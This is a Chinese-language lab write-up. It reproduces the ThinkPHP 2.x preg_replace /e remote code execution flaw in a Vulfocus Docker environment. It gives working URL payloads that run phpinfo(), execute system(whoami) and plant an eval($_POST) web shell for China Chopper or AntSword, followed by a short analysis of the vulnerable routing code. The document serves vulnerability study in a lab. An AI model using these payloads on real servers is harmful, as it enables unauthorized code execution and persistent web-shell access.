ThinkPHP 2.x 任意代码执行漏洞复现

0x00 前言

前段时间看到一个Vulfocus的漏洞集成平台，今天翻出来看了下，也用平台搭建了一个环境进行复现

 

0x01 平台安装

1、拉取镜像并运行

docker pull vulfocus/vulfocus:latest    //拉取镜像
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=xxx.xxx.xxx.xxx(服务器IP) vulfocus/vulfocus

访问平台，默认用户名密码admin/admin

2、添加漏洞镜像

在网站https://hub.docker.com/r/vulfocus寻找需要的漏洞镜像，在服务器使用docker拉取镜像

登录后在镜像管理-添加-本地导入中添加漏洞镜像

3、启动环境

添加成功后，在首页即可启动对应的漏洞环境

访问运行的环境

 

0x02 漏洞概述

ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞

 

0x03 漏洞复现

1、查询phpinfo()

payload：

/index.php?s=/index/index/xxx/${phpinfo()}

2、任意代码执行

payload：

/index.php?s=/index/index/xxx/${system(whoami)}

 3、菜刀连接

payload：

/index.php/module/action/param1/${@print(eval($_POST[c]))}　　//一开始我用菜刀没办法连接，换了蚁剑才连接上

 

0x04 漏洞分析

存在漏洞的文件

/ThinkPHP/Lib/Think/Util/Dispatcher.class.php

漏洞代码位置

在preg_replace()函数中使用正则表达式的/e修饰符时，preg_replace的第二个参数会被当做php代码执行

如：

<?php
$a = 'Clown';
$b = preg_replace('/\d/e', 'print(xxx);', $a);
echo $b;
?>

执行结果：

 虽然报错了，但还是执行了print(xxx)

 $var[\'\\1\']="\\2";是对数组进行操作，将之前第一个值作为新数组的键，将第二个值作为新数组的值

<?php
$var = array();
$b='a/b/c/d/e/f';
preg_replace("/(\w+)\/([^\/\/])/ies",$a='$var[\'\\1\']="\\2";',$b);
print_r($var);
?>

执行结果：

从结果可以看到，是取出两个参数，第一个作为键，第二个作为值

根据这个特性，就可以构造代码执行的语句

 

 

 

参考链接

https://github.com/fofapro/vulfocus

https://www.freebuf.com/column/223149.html